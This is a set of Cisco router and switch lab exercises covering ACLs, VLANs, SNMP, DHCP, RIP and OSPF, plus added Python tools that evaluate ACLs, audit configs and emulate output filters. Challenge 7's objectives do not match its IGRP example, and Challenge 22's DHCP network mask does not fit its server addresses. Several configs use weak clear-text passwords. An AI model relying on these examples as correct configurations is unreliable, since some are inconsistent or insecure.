Cisco's GRE tunneling
icmp
Internet Control Message Protocol
igmp
Internet Gateway Message Protocol
igrp
Cisco's IGRP routing protocol
ip
Any Internet Protocol
ipinip
IP in IP tunneling
nos
KA9Q NOS compatible IP over IP tunneling
ospf
OSPF routing protocol
pcp
Payload Compression Protocol
pim
Protocol Independent Multicast

tcp
Transmission Control Protocol
udp
User Datagram Protocol
(config)# access-list 105 permit tcp host 208.89.101.4 host 41.153.91.2 eq ftp
(config)# access-list 105 deny tcp host 197.119.92.8 host 144.98.220.6 eq ftp
(config)# access-list 105 permit tcp 100.120.83.0 0.0.0.255 71.252.23.0 0.0.0.255 eq ftp
(config)# access-list 105 deny tcp 35.208.170.0 0.0.0.255 184.124.8.0 0.0.0.255 eq ftp

(config)# access-list 105 permit tcp ?
A.B.C.D Source address
any
Any source host
host
A single source host
(config)# access-list 105 permit tcp any ?
A.B.C.D Destination address
any
Any destination host
eq
Match only packets on a given port number
gt
Match only packets with a greater port number
host
A single destination host
lt
Match only packets with a lower port number
neq
Match only packets not on a given port number
range
Match only packets in the range of port numbers
(config)# access-list 105 permit tcp any any
(config)# int e0
(config-if)# ip access-group 105 in

Cisco Router Challenge 20


Outline
This challenge involves the configuration of named ACLs.
Objectives
The objectives of this challenge are to:
Define a named standard ACL.
Define a named extended ACL.

Example
> en
# config t
(config)# ip access-list ?
extended
Extended Access List
log-update Control access list log updates

logging
Control access list logging
standard
Standard Access List
(config)# ip access-list standard ?
<1-99> Standard IP access-list number
WORD
Access-list name
(config)# ip access-list standard leeds
(config-std-nacl)# deny ?
Hostname or A.B.C.D Address to match
any
Any source host
host
A single host address
(config-std-nacl)# deny host 193.34.245.4
(config-std-nacl)# permit host 16.21.50.10
(config-std-nacl)# deny 18.223.156.0 0.15.255.255
(config-std-nacl)# permit 139.32.80.0 0.15.255.255
(config-std-nacl)# exit
(config)# int s0
(config-if)# ip access-group ?
<1-199>
IP access list (standard or extended)
<1300-2699> IP expanded access list (standard or extended)
WORD
Access-list name
(config-if)# ip access-group leeds in
(config-if)# exit
(config)# ip access-list extended tennessee
(config-ext-nacl)# deny ?
<0-255> An IP protocol number
ahp
Authentication Header Protocol
eigrp
Cisco's EIGRP routing protocol
esp
Encapsulation Security Payload
gre
Cisco's GRE tunneling
icmp
Internet Control Message Protocol
igmp
Internet Gateway Message Protocol
igrp
Cisco's IGRP routing protocol
ip
Any Internet Protocol
ipinip
IP in IP tunneling
nos
KA9Q NOS compatible IP over IP tunneling
ospf
OSPF routing protocol
pcp
Payload Compression Protocol
pim
Protocol Independent Multicast
tcp
Transmission Control Protocol
udp
User Datagram Protocol
(config-ext-nacl)# deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet
(config-ext-nacl)# permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet
(config-ext-nacl)# deny tcp 54.83.187.0 0.0.0.255 101.167.107.0 0.0.0.255 eq telnet
(config-ext-nacl)# permit tcp 56.248.48.0 0.0.0.255 138.236.218.0 0.0.0.255 eq telnet
(config-ext-nacl)# exit
(config)# int s1
(config-if)# ip access-group tennessee in
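Challenges 17 to 20 all rely on the same three rules: entries are tested top to bottom and the first match decides, a standard list looks only at the source address, and anything not matched falls to the implicit deny. The following Python is an added example, not NetworkSims material: a small evaluator that parses access-list lines in the form used above and applies those rules to a packet. It is used here on the lists from Challenges 17 and 19 and on a constructed copy of the Challenge 19 deny entry written with a subnet mask in the wildcard position, to show exactly which packets that mistake lets through. The packets and the "wrong mask" list are constructed; the entries are those of the challenges.

```python
"""Evaluator for the numbered standard and extended access lists in Challenges 17 to 20.

Added example, not NetworkSims material. First match wins, implicit deny at the
end, wildcard-mask semantics (0 bit = must match, 1 bit = ignored).
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

PORT_NAMES = {"ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "www": 80}
ANY = ("0.0.0.0", "255.255.255.255")


@dataclass
class Entry:
    action: str
    protocol: str            # "ip" matches every protocol
    src: str
    src_wildcard: str
    dst: str
    dst_wildcard: str
    dst_port: Optional[int]  # None when the entry does not test a port


def wildcard_match(address: str, base: str, wildcard: str) -> bool:
    """True if `address` equals `base` on every bit the wildcard leaves as 0."""
    a, b, w = (int(ipaddress.IPv4Address(x)) for x in (address, base, wildcard))
    care = ~w & 0xFFFFFFFF
    return (a & care) == (b & care)


def _take_address(tokens):
    """Consume one IOS address spec (any | host A | A [wildcard]); return (base, wildcard, rest)."""
    if tokens[0] == "any":
        return ANY[0], ANY[1], tokens[1:]
    if tokens[0] == "host":
        return tokens[1], "0.0.0.0", tokens[2:]
    if len(tokens) > 1 and tokens[1][0].isdigit():
        return tokens[0], tokens[1], tokens[2:]
    return tokens[0], "0.0.0.0", tokens[1:]   # bare address in a standard ACL means one host


def parse_acl(lines):
    """Build the entry list of one numbered ACL from its `access-list N ...` lines."""
    entries = []
    for line in lines:
        tokens = line.replace("(config)#", "").split()
        if tokens[:1] != ["access-list"] or len(tokens) < 4 or tokens[2] == "remark":
            continue
        number, action, rest = int(tokens[1]), tokens[2], tokens[3:]
        standard = 1 <= number <= 99 or 1300 <= number <= 1999
        if standard:               # standard lists test the source address only
            src, swc, rest = _take_address(rest)
            entries.append(Entry(action, "ip", src, swc, *ANY, None))
            continue
        protocol, rest = rest[0], rest[1:]
        src, swc, rest = _take_address(rest)
        dst, dwc, rest = _take_address(rest)
        port = None
        if rest[:1] == ["eq"]:
            port = PORT_NAMES.get(rest[1]) or int(rest[1])
        entries.append(Entry(action, protocol, src, swc, dst, dwc, port))
    return entries


def evaluate(entries, src, dst, protocol="ip", dst_port=None) -> str:
    """Return "permit" or "deny" for a packet; unmatched packets hit the implicit deny."""
    for e in entries:
        if e.protocol != "ip" and e.protocol != protocol:
            continue
        if e.dst_port is not None and e.dst_port != dst_port:
            continue
        if wildcard_match(src, e.src, e.src_wildcard) and wildcard_match(dst, e.dst, e.dst_wildcard):
            return e.action
    return "deny"


ACL_2 = parse_acl([   # Challenge 17
    "access-list 2 permit host 130.152.162.10",
    "access-list 2 deny host 193.68.36.8",
    "access-list 2 permit 207.182.133.0 0.1.255.255",
    "access-list 2 deny 153.246.194.0 0.0.127.255",
    "access-list 2 permit any",
])

ACL_105 = parse_acl([  # Challenge 19, with wildcard masks
    "access-list 105 permit tcp host 208.89.101.4 host 41.153.91.2 eq ftp",
    "access-list 105 deny tcp host 197.119.92.8 host 144.98.220.6 eq ftp",
    "access-list 105 permit tcp 100.120.83.0 0.0.0.255 71.252.23.0 0.0.0.255 eq ftp",
    "access-list 105 deny tcp 35.208.170.0 0.0.0.255 184.124.8.0 0.0.0.255 eq ftp",
    "access-list 105 permit tcp any any",
])

# Same intent written with subnet masks where wildcards belong (constructed mistake).
ACL_105_WRONG = parse_acl([
    "access-list 105 deny tcp 35.208.170.0 255.255.255.0 184.124.8.0 255.255.255.0 eq ftp",
    "access-list 105 permit tcp any any",
])

if __name__ == "__main__":
    print(evaluate(ACL_2, "207.183.9.9", "10.0.0.1"))                        # permit: 0.1.255.255 spans 207.182 and 207.183
    print(evaluate(ACL_105, "197.119.92.8", "144.98.220.6", "tcp", 21))      # deny: the FTP entry matches
    print(evaluate(ACL_105, "197.119.92.8", "144.98.220.6", "tcp", 23))      # permit: telnet is not ftp
    print(evaluate(ACL_105_WRONG, "35.208.170.7", "184.124.8.9", "tcp", 21)) # permit: the deny now needs a last octet of 0
```

With 255.255.255.0 in the wildcard position the first three octets become "don't care" and only the last octet has to match, so the deny catches 9.9.9.0 talking to 1.1.1.0 and misses 35.208.170.7 talking to 184.124.8.9, the opposite of what was intended. Note also that the final permit tcp any any in Challenge 19 permits only TCP; a UDP packet reaching the end of that list is dropped by the implicit deny.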

Cisco Router Challenge 51


Outline
This challenge involves removing users from the configuration. Note that the running configuration shown also has service tcp-small-servers and service udp-small-servers enabled (the echo, chargen, discard and daytime services), which have no role on a production router and should be removed with the no form of each command.
Objectives
The objectives of this challenge are to:
Remove users from the configuration.

Example
> en
# sh run
Building configuration...
Current configuration : 1380 bytes
!
version 12.0
service udp-small-servers
service tcp-small-servers
no ip subnet-zero
!
!
username fred password bert
username albert password ink
username martin password orange
!
no ip classless
no ip subnet-zero
!
interface ethernet 0
shutdown
!
interface ethernet 1
shutdown
!
interface serial 0
shutdown
!
interface serial 1
shutdown
!
interface bri 0
shutdown
!
!
ip host sun 192.168.1.1
ip host mars 10.0.0.1
ip host jupiter 172.10.1.1
cdp holdtime 120
cdp timer 60
!
end
# config t
(config)# no username fred
(config)# no username albert
(config)# no username martin
(config)# no ip host sun
(config)# no ip host jupiter
(config)# no ip host mars

Cisco Router Challenge 52


Outline
This challenge involves getting rid of network configurations.
Objectives
The objectives of this challenge are to:

Remove networks from RIP.

Example
> en
# sh run
Building configuration...
Current configuration : 1380 bytes
!
version 12.0
service udp-small-servers
service tcp-small-servers
no ip subnet-zero
!
no ip classless
no ip subnet-zero
!
interface ethernet 0
shutdown
!
interface ethernet 1
shutdown
!
interface serial 0
shutdown
!
interface serial 1
shutdown
!
interface bri 0
shutdown
!
!
router rip
network 192.168.1.0
network 10.0.0.0
network 172.10.10.0
!
cdp holdtime 120
cdp timer 60
!
!
end
# config t
(config)# router rip
(config-router)# no network 192.168.1.0
(config-router)# no network 10.0.0.0
(config-router)# no network 172.10.10.0

Cisco Router Challenge 53


Outline
This challenge involves getting rid of the SNMP configurations.
Objectives
The objectives of this challenge are to:

Get rid of the SNMP-server configurations.

Example
> en
# sh run
Building configuration...
Current configuration : 1380 bytes
!
version 12.0
service udp-small-servers
service tcp-small-servers
no ip subnet-zero
!
!
snmp-server community annt ro
snmp-server contact steven
snmp-server location uk
snmp-server host 78.113.70.11
snmp-server enable traps
snmp-server chassis-ID paris
!
!
!
no ip classless
no ip subnet-zero
!
!
interface ethernet 0
shutdown
!
interface ethernet 1
shutdown
!
interface serial 0
shutdown
!
interface serial 1
shutdown
!
interface bri 0
shutdown
!
!
!
!
!
!
!
cdp holdtime 120
cdp timer 60
!
!
end
# config t
(config)# no snmp-server community annt RO
(config)# no snmp-server contact steven
(config)# no snmp-server location uk
(config)# no snmp-server host 78.113.70.11
(config)# no snmp-server enable traps
(config)# no snmp-server chassis-ID paris
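
The removals in Challenges 51 and 53 are done by hand from a `show run` listing. As an added example (not NetworkSims code), the Python below audits a captured running-config for the same exposures and emits the matching `no ...` commands. The config text is constructed from the two challenge transcripts; the severity labels are this example's own choice.

```python
"""Added example: audit a Cisco IOS running-config for exposures that the
Router Challenges 51 and 53 transcripts remove by hand, and produce the
corresponding remediation commands."""
import re

# Constructed sample: the relevant lines from the Challenge 51 and 53 configs.
SAMPLE_CONFIG = """\
version 12.0
service udp-small-servers
service tcp-small-servers
!
username fred password bert
username albert password ink
!
snmp-server community annt ro
snmp-server contact steven
snmp-server location uk
snmp-server host 78.113.70.11
snmp-server enable traps
!
end
"""


def audit_config(config_text):
    """Return a list of (severity, finding, remediation) tuples.

    Checks performed (defender-side, in config order):
      * service tcp/udp-small-servers: legacy echo/chargen/discard/daytime
        listeners, off by default on current IOS; a fingerprinting and
        amplification surface when switched on.
      * `username X password Y` (type 0): the secret is stored in clear
        text. `username X secret Y` (hashed) is the form to prefer.
      * snmp-server community: a read-only community still exposes the
        interface, ARP and routing tables; read-write lets a peer rewrite
        the configuration.
    """
    findings = []
    for line in (l.rstrip() for l in config_text.splitlines()):
        if re.fullmatch(r"service (tcp|udp)-small-servers", line):
            findings.append(("medium",
                             f"legacy small servers enabled: {line}",
                             f"no {line}"))
            continue
        m = re.fullmatch(
            r"username (\S+)(?: privilege \d+)? password (?:0 )?(\S+)", line)
        if m:
            user = m.group(1)
            findings.append(("high",
                             f"clear-text (type 0) password for user {user}",
                             f"no username {user}"))
            continue
        m = re.fullmatch(r"snmp-server community (\S+)(.*)", line)
        if m:
            comm, rest = m.group(1), m.group(2)
            mode = "rw" if re.search(r"\bRW\b", rest, re.I) else "ro"
            findings.append(("critical" if mode == "rw" else "high",
                             f"SNMP {mode} community '{comm}' configured",
                             f"no snmp-server community {comm}"))
    return findings


def remediation_script(config_text):
    """The `no ...` lines to paste into `config t`, in config order."""
    return [fix for _, _, fix in audit_config(config_text)]


if __name__ == "__main__":
    for sev, what, fix in audit_config(SAMPLE_CONFIG):
        print(f"[{sev}] {what}  ->  {fix}")
```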

Cisco Router Challenge 58


Outline
This is a test. Good luck!

Cisco Switch Challenge 1


Outline
This challenge involves the configuration of an IP address on a VLAN.

Objectives
The objectives of this challenge are to:

Setup the VLAN address.


Define a domain-name.
Define the default gateway.

Example

> en
# config t
(config)# int vlan 1
(config-if)# ip address 148.183.229.5 255.255.248.0
(config-if)# exit
(config)# ip domain-name perthshire.cc
(config)# ip default-gateway 148.183.229.6

Cisco Switch Challenge 2


Outline
This challenge involves the configuration of the console password and to enable the HTTP
server.

Objectives
The objectives of this challenge are to:

Setup the console password.


Enable the HTTP server.
Define the HTTP port.
Define the name server.

Example
> en
# config t
(config)# line con 0
(config-line)# password texas
(config-line)# exit
(config)# ip http server
(config)# ip http port 1024
(config)# cdp run
(config)# ip name-server 14.154.109.7

Cisco Switch Challenge 3


Outline
This challenge involves the configuration of the VTY server and SNMP settings.
Objectives
The objectives of this challenge are to:

Setup a password on the Telnet session.


Define a username and password.
Define SNMP parameters.

Example
# config t
(config)# line vty 0 15
(config-line)# login
(config-line)# password manchester
(config-line)# exit
(config)# username june password default1
(config)# snmp-server ?
chassis-id
String to uniquely identify this chassis
community
Enable SNMP; set community string and access privs
contact
Text for mib object sysContact
enable
Enable SNMP Traps or Informs
engineID
Configure a local or remote SNMPv3 engineID
group
Define a User Security Model group
host
Specify hosts to receive SNMP notifications
ifindex
Enable ifindex persistence
inform
Configure SNMP Informs options
location
Text for mib object sysLocation
manager
Modify SNMP manager parameters
packetsize
Largest SNMP packet size
queue-length
Message queue length for each TRAP host
system-shutdown
Enable use of the SNMP reload command
tftp-server-list Limit TFTP servers used via SNMP
trap
SNMP trap options
trap-source
Assign an interface for the source address of all traps
trap-timeout
Set timeout for TRAP message retransmissions
user
Define a user who can access the SNMP engine
view
Define an SNMPv2 MIB view
(config)# snmp-server community popup
(config)# snmp-server contact june
(config)# snmp-server location glasgow
(config)# snmp-server ?
chassis-id
String to uniquely identify this chassis
community
Enable SNMP; set community string and access privs
contact
Text for mib object sysContact
enable
Enable SNMP Traps or Informs
engineID
Configure a local or remote SNMPv3 engineID
group
Define a User Security Model group
host
Specify hosts to receive SNMP notifications
ifindex
Enable ifindex persistence
inform
Configure SNMP Informs options
location
Text for mib object sysLocation
manager
Modify SNMP manager parameters
packetsize
Largest SNMP packet size
queue-length
Message queue length for each TRAP host
system-shutdown
Enable use of the SNMP reload command
tftp-server-list Limit TFTP servers used via SNMP
trap
SNMP trap options
trap-source
Assign an interface for the source address of all traps
trap-timeout
Set timeout for TRAP message retransmissions
user
Define a user who can access the SNMP engine
view
Define an SNMPv2 MIB view
(config)# snmp-server enable ?
informs Enable SNMP Informs
traps
Enable SNMP Traps
(config)# snmp-server enable traps
(config)# snmp-server chassis-id brighton

Cisco Switch Challenge 4


Outline
This challenge involves the configuration of a hosts table.
Objectives
The objectives of this challenge are to:

Define the default gateway.


Enable an IP hosts table.

Example
# config t
Enter configuration commands, one per line.  End with CNTL/Z.
(config)# ip default-gateway 142.163.250.7
(config)# ip host ?
WORD Name of host
(config)# ip host brechin ?
<0-65535>   Default telnet port number
A.B.C.D     Host IP address
additional  Append addresses
(config)# ip host brechin 209.250.181.10
(config)# ip host mississippi 208.194.196.5
(config)# ip host westvirginia 205.27.128.4
(config)# exit
# show hosts

Cisco Switch Challenge 5


Outline
This challenge involves the configuration of ethernet port settings and CDP.
Objectives
The objectives of this challenge are to:

Setup a description on FA0/1.


Setup a speed on FA0/1.
Setup duplex on FA0/1.
Define CDP details.

Example
# config t
Enter configuration commands, one per line.  End with CNTL/Z.
(config)# int fa0/1
(config-if)# no shutdown
(config-if)# description aironet 1200
(config-if)# speed 100
(config-if)# duplex full
(config-if)# int fa0/2
(config-if)# no shutdown
(config-if)# exit
(config)# cdp run
(config)# int fa0/1
(config-if)# cdp enable
(config-if)# exit
(config)# cdp ?
advertise-v2 CDP sends version-2 advertisements
holdtime
Specify the holdtime (in sec) to be sent in packets
timer
Specify the rate at which CDP packets are sent (in sec)
run
(config)# cdp timer ?
<5-254> Rate at which CDP packets are sent (in sec)
(config)# cdp holdtime ?
<10-255> Length of time (in sec) that receiver must keep this packet
(config)# cdp timer 89
(config)# cdp holdtime 41

Cisco Switch Challenge 6


Outline
This challenge involves the configuration of VLANs.
Objectives
The objectives of this challenge are to:

Setup VLAN 1, and define an IP address.


Setup VLAN 2, and define an IP address.

The commands used are:

> en
# config t
(config)# int vlan 1
(config-if)# ip address 131.45.110.4 255.192.0.0
(config-if)# shutdown
(config)# vlan 1
(config-vlan)# name test
(config-vlan)# exit
(config)# int vlan 2
(config-if)# ip address 81.200.53.4 255.255.0.0
(config-if)# exit
(config)# vlan 2
(config-vlan)# name test2
(config-vlan)# exit

Or, using the legacy method:


> en
# vlan database
(vlan)# vlan 1 name newjersey
(vlan)# exit
# config t
(config)# int vlan 1
(config-if)# ip address 131.45.110.4 255.192.0.0
(config-if)# shutdown
(config-if)# exit
(config)# int vlan 2
(config-if)# ip address 81.200.53.4 255.255.0.0
(config-if)# exit

Example
> en
# config t
(config)# int vlan 1
(config-if)# ip address 131.45.110.4 255.192.0.0
(config-if)# shutdown
(config)# vlan 1
Switch(config-vlan)# ?
VLAN configuration commands:
are
Maximum number of All Route Explorer hops for this VLAN (or zero if none specified)
backupcrf
Backup CRF mode of the VLAN
bridge
Bridging characteristics of the VLAN
exit
Apply changes, bump revision number, and exit mode
media
Media type of the VLAN
mtu
VLAN Maximum Transmission Unit
name
Ascii name of the VLAN
no
Negate a command or set its defaults
parent
ID number of the Parent VLAN of FDDI or Token Ring type VLANs
private-vlan
Configure a private VLAN
remote-span
Configure as Remote SPAN VLAN
ring
Ring number of FDDI or Token Ring type VLANs
said
IEEE 802.10 SAID
shutdown
Shutdown VLAN switching
state
Operational state of the VLAN
ste
Maximum number of Spanning Tree Explorer hops for this VLAN (or zero if none specified)
stp
Spanning tree characteristics of the VLAN
tb-vlan1
ID number of the first translational VLAN for this VLAN (or zero if none)
tb-vlan2
ID number of the second translational VLAN for this VLAN (or zero if none)
(config-vlan)# name ?
WORD The ascii name for the VLAN
(config-vlan)# name test
(config-vlan)# exit
(config)# int vlan 2
(config-if)# ip address 81.200.53.4 255.255.0.0
(config-if)# exit
(config)# vlan 2
(config-vlan)# name test2
(config-vlan)# exit

Or, using the legacy method:


> en
# vlan database
(vlan)# vlan 1 name newjersey
VLAN 1 added:
Name: newjersey
(vlan)# vlan 2 name brighton
VLAN 2 added:
Name: brighton
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int vlan 1
(config-if)# ip address 131.45.110.4 255.192.0.0
(config-if)# shutdown
(config-if)# exit
(config)# int vlan 2
(config-if)# ip address 81.200.53.4 255.255.0.0
(config-if)# exit

Cisco Switch Challenge 7


Outline
This challenge involves the configuration of switchport access parameters.
Objectives
The objectives of this challenge are to:

Setup VLAN 2.

Define switchport access for VLAN 2.

Example
> en
# vlan database
(vlan)# vlan 2 name amsterdam
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int vlan 2
(config-if)# ip address 161.161.238.9 255.255.255.248
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access ?
vlan Set VLAN when interface is in access mode
(config-if)# switchport access vlan 2
(config-if)# int fa0/5
(config-if)# switchport access vlan 2

Cisco Switch Challenge 8


Outline
This challenge involves the configuration of timeouts for the console.
Objectives
The objectives of this challenge are to:

Setup a password on the console.


Define timeouts for the console.

Example
> en
# config t
(config)# line con 0
(config-line)# password lothian
(config-line)# timeout ?
login Timeouts related to the login sequence
(config-line)# timeout login ?
response Timeout for any user input during login sequences
(config-line)# timeout login response ?
<0-300> Timeout in seconds
(config-line)# timeout login response 19
(config-line)# exec-timeout ?
<0-35791> Timeout in minutes
(config-line)# exec-timeout 11
(config-line)# log ?
synchronous Synchronized message output
(config-line)# log synchronous
(config-line)# line vty 0 8
(config-line)# login
(config-line)# password mississippi
(config-line)# timeout login response 12
(config-line)# exec-timeout 10

Cisco Router Test


Outline
This is a router test. Good luck!

Router Challenge 32
Outline
This challenge involves the configuration of Simple Network Time Protocol (SNTP).
Objectives
The objectives of this challenge are to:

Setup SNTP to receive time updates from a specific server.


Setup device to receive SNTP broadcasts.
Set the system clock (this would not be required if an SNTP server is used, obviously).

Example
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# sntp server 192.168.1.100
amsterdam (config)# sntp broadcast client
amsterdam (config)# exit
amsterdam # clock set 05:44
amsterdam # show sntp
SNTP server      Stratum   Version   Last Receive
192.168.1.100    16                  never

Broadcast client mode is enabled.

Router Challenge 125 (Filtering)


Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the
output in the show command.
Explanation
The filtering output includes:
show command | include word    this finds all lines with word
show command | begin word      this finds all lines which begin with word
show command | exclude word    this finds all lines without word
An example is:
# show running | include udp
# show running | include tcp
# show running | include !
# show running | begin version
# show running | exclude int

Router Challenge 126 (Filtering)


Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the
output in the show command.
Explanation
The filtering output includes:
show command | include word    this finds all lines with word
show command | begin word      this finds all lines which begin with word
show command | exclude word    this finds all lines without word
An example is:
# show version | include cisco
# show version | include product
# show version | include ver
# show version | begin power
# show version | exclude pca

Switch Challenge 39 (Filtering)


Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the
output in the show command.
Explanation
The filtering output includes:
show command | include word    this finds all lines with word
show command | begin word      this finds all lines which begin with word
show command | exclude word    this finds all lines without word
An example is:
# show running | include udp
# show running | include tcp
# show running | include !
# show running | begin version
# show running | exclude int

Switch Challenge 40 (Filtering)


Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the
output in the show command.
Explanation
The filtering output includes:
show command | include word    this finds all lines with word
show command | begin word      this finds all lines which begin with word
show command | exclude word    this finds all lines without word
An example is:
# show version | include cisco
# show version | include product
# show version | include ver
# show version | begin power
# show version | exclude pca
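
The three pipe filters used in the Filtering challenges above (Router 125 and 126, Switch 39 and 40), as an added Python example that is not part of the NetworkSims text. The sample output is constructed; two IOS facts worth knowing are that the filter argument is a regular expression (so `include !` works because `!` has no special meaning) and that `begin` starts at the first line matching the pattern and then prints everything that follows it.

```python
"""Added example: IOS-style `show ... | include/exclude/begin` filters."""
import re

# Constructed: a fragment resembling the `show running-config` listings
# used in the router challenges.
SHOW_RUNNING = """\
version 12.0
service udp-small-servers
service tcp-small-servers
!
interface ethernet 0
 shutdown
!
ip host sun 192.168.1.1
end"""


def pipe_filter(output, verb, pattern):
    """Apply one IOS output filter to a block of text and return the lines kept.

    include  keep only lines matching the regular expression
    exclude  drop lines matching the regular expression
    begin    keep everything from the first matching line to the end
    Python's `re` accepts a superset of the IOS regex syntax, so anything
    that works on the router works here (the reverse is not always true).
    """
    lines = output.splitlines()
    rx = re.compile(pattern)
    if verb == "include":
        return [l for l in lines if rx.search(l)]
    if verb == "exclude":
        return [l for l in lines if not rx.search(l)]
    if verb == "begin":
        for i, l in enumerate(lines):
            if rx.search(l):
                return lines[i:]
        return []
    raise ValueError(f"unknown filter verb: {verb}")


def show(command_output, pipeline):
    """Take the text after the `|` exactly as typed at the prompt,
    e.g. show(SHOW_RUNNING, "include udp")."""
    verb, _, pattern = pipeline.partition(" ")
    return pipe_filter(command_output, verb, pattern)


if __name__ == "__main__":
    for pipeline in ("include udp", "include !", "begin interface", "exclude int"):
        print(f"# show running | {pipeline}")
        print("\n".join(show(SHOW_RUNNING, pipeline)))
```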

Advanced Routing

Cisco Router Challenge 22


Outline
This challenge involves the configuration of a DHCP server on the router.

Objectives
The objectives of this challenge are to:

Setup a DHCP server.


Setup a DHCP Pool.
Define DHCP networks and subnets.
Define DHCP parameters, such as DNS, NetBios, Timeout and domain.

Example
> en
# config t
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 255.255.255.254
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
DHCP address conflict parameters
database
Configure DHCP database agents
excluded-address
Prevent DHCP from assigning certain addresses
limited-broadcast-address Use all 1's broadcast address
ping
Specify ping parameters used by DHCP
pool
Configure DHCP address pools
relay
DHCP relay agent parameters
smart-relay
Enable Smart Relay feature
(config)#ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
packets Specify number of ping packets
timeout Specify ping timeout
(config)# ip dhcp ping timeout 350

Cisco Router Challenge 23


Outline
This challenge involves the configuration of IP helper addresses.

Objectives
The objectives of this challenge are to:

Setup E0 parameters.
Setup IP helper addresses.

Example
> en
# config t
(config)# int e0
(config-if)# ip address 204.184.207.9 255.255.255.192
(config-if)# ip helper-address 132.61.138.4
(config-if)# int s0
(config-if)# ip address 192.184.207.9 255.255.255.192
(config-if)# ip helper-address 132.61.138.4
(config-if)# int s1
(config-if)# ip address 10.18.207.9 255.255.255.192
(config-if)# ip helper-address 132.61.138.4

Cisco Router Challenge 7


Outline
This challenge involves the configuration of the E0 port on a router.

Objectives
The objectives of this challenge are to:

Setup the IP address on E0 port.


Setup the subnet mask on E0 port.

Enable the E0 port.


Set the description for the E0 port.
Define the speed of the E0 port.
Define duplex on the E0 port.

Example
> en
# config t
Enter configuration commands, one per line.  End with CNTL/Z.
(config)# hostname washington
washington (config)# router igrp 128
washington (config-router)# network 149.91.240.0
washington (config-router)# network 45.0.0.0
washington (config-router)# network 157.43.72.0
washington (config-router)# variance 65
washington (config-router)# timers ?
basic Basic routing protocol update timers
washington (config-router)# timers basic ?
<0-4294967295> Interval between updates
washington (config-router)# timers basic 9 ?
<1-4294967295> Invalid
washington (config-router)# timers basic 9 11 ?
<0-4294967295> Holddown
washington (config-router)# timers basic 9 11 1 ?
<1-4294967295> Flush
washington (config-router)# timers basic 9 11 1 21 ?
washington (config-router)# exit
washington (config)# ip default-network 101.220.22.0

Cisco Router Challenge 28


Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables.
Objectives
The objectives of this challenge are to:

Setup a RIP Version 2.


Define authentication for RIP.

Example
> en
# config t
(config)# router rip
(config-router)# version 2
(config-router)# network 194.205.128.0
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
auto-summary
Enable automatic network number summarization
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
flash-update-threshold Specify flash update threshold in second
help
Description of the interactive help system
input-queue
Specify input queue depth
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
offset-list
Add or subtract offset from IGRP or RIP metrics
output-delay
Interpacket delay for RIP updates
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing
protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of
routing updates
version
Set routing protocol version
(config-router)# exit
(config)# key ?
chain
Key-chain management
config-key Set a private configuration key
(config)# key chain ?
WORD Key-chain name
(config)# key chain martin
(config-keychain)# ?
Key-chain configuration commands:
default Set a command to its defaults
exit
Exit from key-chain configuration mode
key
Configure a key
no
Negate a command or set its defaults
(config-keychain)# key ?
<0-2147483647> Key identifier
(config-keychain)# key 1
(config-keychain-key)# key-string officer
(config-keychain-key)# exit
(config-keychain)# exit
(config)# int e0
(config-if)# ip rip authentication ?
key-chain Authentication key-chain
mode
Authentication mode
(config-if)# ip rip authentication key-chain martin
(config-if)# ip rip authentication mode ?
md5
Keyed message digest
text Clear text authentication
(config-if)# ip rip authentication mode md5

Cisco Router Challenge 35


Outline
This challenge involves the configuration of OSPF.

Objectives
The objectives of this challenge are to:

Setup OSPF
Define networks within a given area.
Define OSPF parameters.

Example
> en
# config t
(config)# router ospf ?
<1-65535> Process ID
(config)# router ospf 146
(config-router)# network 211.79.208.0 0.0.0.255 area 0
(config-router)# network 130.184.0.0 0.0.0.255 area 0
(config-router)# network 206.198.48.0 0.0.0.255 area 0
(config-router)# ?
Router configuration commands:
area
OSPF area parameters
auto-cost
Calculate OSPF interface cost according to bandwidth
capability
Enable specific OSPF feature
compatible
OSPF compatibility list
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
discard-route
Enable or disable discard-route installation
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
domain-id
OSPF domain-id
domain-tag
OSPF domain-tag
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
ignore
Do not complain about specific event
log-adjacency-changes Log changes in adjacency state
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing protocol
router-id
router-id for this OSPF process
summary-address
Configure IP address summaries
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
(config-router)#area ?
<0-4294967295> OSPF area ID as a decimal value
A.B.C.D
OSPF area ID in IP address format
(config-router)#area 0 ?
authentication Enable authentication
default-cost
Set the summary default-cost of a NSSA/stub area
nssa
Specify a NSSA area
range
Summarize routes matching address/mask (border routers only
stub
Specify a stub area
virtual-link
Define a virtual link and its parameters
(config-router)#area 0 range ?
